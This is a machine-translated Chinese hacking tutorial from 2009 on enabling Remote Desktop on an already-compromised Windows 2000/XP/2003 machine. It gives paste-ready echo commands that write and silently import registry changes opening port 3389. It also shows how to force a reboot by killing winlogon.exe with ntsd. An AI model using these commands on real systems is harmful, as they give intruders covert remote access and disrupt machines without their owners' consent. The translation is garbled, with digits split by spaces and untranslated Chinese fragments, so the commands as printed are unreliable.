Green open terminal simple method-vulnerability warning-the black bar safety net

2009-03-21T00:00:00
ID MYHACK58:62200922588
Type myhack58
Reporter 佚名
Modified 2009-03-21T00:00:00

Description

The presentation today of this open terminal, green, environmental protection, no pollution~~ Not required to upload any files on the terminal the method is suitable for win2k,xp,2 0 0 3. This article premise is already through some method to get to the other side of a SYSTEM the permissions of the CMDSHELL~~ In no need to pass any file with the case open the Terminal Services.

A win 2k terminal to open the terminal First use ECHO to write a 3 3 8 9. reg file,and then import into the registry, the echo code is as follows:

echo Windows Registry Editor Version 5.00 >>3 3 8 9. reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3 3 8 9. reg echo "Enabled"="0" >>3 3 8 9. reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3 3 8 9. reg echo "ShutdownWithoutLogon"="0" >>3 3 8 9. reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3 3 8 9. reg echo "EnableAdminTSRemote"=dword:0 0 0 0 0 0 0 1 >>3 3 8 9. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3 3 8 9. reg echo "TSEnabled"=dword:0 0 0 0 0 0 0 1 >>3 3 8 9. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3 3 8 9. reg echo "Start"=dword:0 0 0 0 0 0 0 2 >>3 3 8 9. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3 3 8 9. reg echo "Start"=dword:0 0 0 0 0 0 0 2 >>3 3 8 9. reg echo [HKEY_USERS\. DEFAULT\Keyboard Layout\Toggle] >>3 3 8 9. reg echo "Hotkey"="1" >>3 3 8 9. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3 3 8 9. reg echo "PortNumber"=dword:00000D3D >>3 3 8 9. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3 3 8 9. reg echo "PortNumber"=dword:00000D3D >>3 3 8 9. reg These ECHO the code to the CMDSHELL under the patch adhesive can generate 3 3 8 9. reg file and then regedit /s 3 3 8 9. reg to import the registry. (If you want to change the terminal port are only required to put the above two D3D are modified click on it) Because win 2k under open-terminal not like XP as much as you can take effect immediately,but you need to restart the machine only after the entry into force. 一 个 简单 的 办法 就是 用 ntsd.exe(win 2k and above comes with a command)to the end of an important process can be to achieve the machine restart!! 比如 结束 winlogon.exe,lsass. exe can also be, but the end will jump out of the restart countdown(not very good~) winlogon. exe is turned off after the machine is immediately forced to restart. The command execution format for ntsd-c q-p PID That's how to know the winlogon. exe PID process number.~ Following this script you can include all the current process's PID:

wscript. echo "PID ProcessName" for each ps in getobject("winmgmts:\\.\ root\cimv2:win32_process"). instances_ wscript. echo ps. handle&vbtab&ps. name next In CMDSHELL window paste the following ECHO code you can get to view the process PID of the script 1. vbe: the echo wscript. echo "PID ProcessName">>1. vbe echo for each ps in getobject("winmgmts:\\.\ root\cimv2:win32_process"). instances_ >>1. vbe echo wscript. echo ps. handle^&vbtab^&ps. name>>1. vbe echo next>>1. vbe

Generate 1. vbe please check the echo out of the script is wrong(only four rows, of about given above can). Run 1. vbe obtained the following operation results:

C:\WINNT\system32>cscript 1. vbe cscript 1. vbe Microsoft (R) Windows Script Host version 5.1 for Windows Copyright(C) Microsoft Corporation 1996-1999. All rights reserved.

PID ProcessName 0 System Idle Process 8 System 1 5 2 smss.exe 1 8 0 csrss.exe 2 0 0 winlogon.exe 2 2 8 services.exe 2 4 0 lsass.exe 4 2 4 svchost.exe 4 7 2 spoolsv.exe 5 1 2 msdtc.exe 6 1 6 svchost.exe 6 2 8 KAVSvc.EXE 6 6 0 llssrv.exe 6 9 2 nvsvc32.exe 7 2 8 regsvc.exe 7 4 8 MSTask.exe 7 7 6 alter.exe 9 0 0 svchost.exe 9 1 6 WinMgmt.exe 1 0 8 8 Dfssvc.exe 4 8 4 Explorer.EXE 1 4 4 4 mdm.exe 1 3 4 0 Server.exe 1 2 2 4 ibguard.exe 1 2 5 2 KAVSvcUI.EXE 1 2 5 6 ibserver.exe 1 3 3 6 internat.exe 1 2 0 4 Uspds.exe 7 2 0 bar.exe 1 2 8 8 dllhost.exe 1 5 8 0 inetinfo.exe 1 6 7 2 cmd.exe 1 4 6 4 pppoe.exe 1 7 0 4 regedit.exe 3 1 6 cscript.exe

From the above it can be seen that the current winlogon. exe PID number is 2 0 0 to run the command ntsd-c q-p 2 0 0 (2 0 0 to replace the winlogon. exe process on PID.) 'll machine mA

On restart(ntsd. exe is WIN comes with can be used to end any level of the process)waiting for the harvest.~~

Second, winxp and win2003 terminal open

Open the REG file code is as follows: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword:0 0 0 0 0 0 0 0 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] "PortNumber"=dword:00000D3D [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] "PortNumber"=dword:00000D3D To ECHO the code to write a REG file: echo Windows Registry Editor Version 5.00>>3 3 8 9. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3 3 8 9. reg echo "fDenyTSConnections"=dword:0 0 0 0 0 0 0 0>>3 3 8 9. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3 3 8 9. reg echo "PortNumber"=dword:00000d3d>>3 3 8 9. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3 3 8 9. reg echo "PortNumber"=dword:00000d3d>>3 3 8 9. reg regedit /s 3 3 8 9. reg del 3 3 8 9. reg This xp and 2 0 0 3 Open the terminal is not restarted if you want to change port just above the two PortNumber corresponding to the D3D into a corresponding decimal number of the hexadecimal form can be! With calculator to convert. XP whether to open the terminal or modified terminal to the port are not required to restart, it's so nice~~hehe. If you want to close the final closed simply put"fDenyTSConnections"=dword:0 0 0 0 0 0 0 0

Change the"fDenyTSConnections"=dword:0 0 0 0 0 0 0 1